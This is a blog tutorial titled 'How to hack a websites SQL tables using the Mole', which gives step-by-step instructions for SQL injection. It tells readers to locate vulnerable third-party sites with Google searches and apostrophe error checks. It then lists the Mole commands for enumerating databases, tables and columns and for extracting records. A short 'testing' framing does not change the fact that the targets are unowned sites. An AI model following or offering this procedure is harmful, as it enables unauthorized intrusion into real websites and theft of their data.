Skip to content

SQL Injection – How to hack a websites SQL tables using the Mole


To test websites are safe from SQL injection we can use SQLMAP or Mole.  Here we show the syntax to use The Mole for SQL injection testing.


Step 1 – Download Python 3 for Windows or Kali Linux

Step 2 – Download the Mole

Step 3 – Install and launch the Mole

Install to C:\mole

cd themole-0.3-win32

dir    – check that you can see mole.exe.


mole launch

To type in syntax, go to step 5.

Step 4 – Find a vulnerable website

Use Google.  Search for the term


Browse to the website and then put a single dash at the end of the url.

so it reads php?=id1′

If you get an error the website is vulnerable.


Using the sites returned by google, check each site by put an apostrophe after the 1, if an error appears, then the site is vulnerable.


Step 5 – Attack Syntax to get the Website Databases

mole needle


needle xxxx

(xxx =use a word found on the page).


Caution regarding Needle.  If you use a term not found on the page, you’ll get an error.  Here we used the term “home” eg needle home

mole error

Now you’ll see the databases on the site appear.  Write down the name of the databases, as we’ll use these where dbname appears in our syntax.

mole databases

So we can use information_schema where dbname is needed.


Step 6 – Attack Syntax to get the Tables

tables Dbname

for example

tables information_schema

mole tables

The table information_schema shows us that it has 40 rows of data, and further tables.


Step 7 – Attack Syntax to get the Column

columns dbname tablename

for example

columns information_schema tableabc


Step 8 – Attack Syntax to get the records from the tables

query dbname tablename colm1,colm2.colm3


For testing websites, would I recommend Mole or SQLMAP?  For ease of use it has to be SQLMAP.


SQLMAP – How to hack a Website’s SQL tables on Windows

Leave a Comment

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: